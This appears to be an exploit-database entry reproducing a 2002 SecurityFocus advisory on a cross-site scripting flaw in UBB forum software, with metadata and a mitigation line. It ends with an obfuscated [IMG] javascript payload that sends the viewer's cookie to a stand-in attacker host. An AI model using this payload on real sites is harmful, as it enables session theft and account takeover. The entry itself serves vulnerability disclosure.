header-logo
Suggest Exploit
vendor:
UBB
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Agent Scripting
79
CWE
Product Name: UBB
Affected Version From: UBB
Affected Version To: UBB
Patch Exists: No
Related CWE: N/A
CPE: a:ubb:ubb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix/Linux variants, Microsoft Windows NT/2000
2002

UBB Cross-Agent Scripting Vulnerability

UBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running UBB. This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials.

Mitigation:

Input validation should be used to prevent malicious users from inserting arbitrary script code into messages.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3829/info

UBB (Ultimate Bulletin Board) is commercial web forums/community software that is written in Perl. It runs on various Unix/Linux variants, as well as Microsoft Windows NT/2000.

UBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running UBB.

This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials. 

The following example will send cookie-based authentication credentials to the attacker's site:

[IMG]javascript:document.write
&#x28;'<img%20src=&#x68;tt&#x70;://attackersite/tools/cookie.plx?
cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
[/IMG]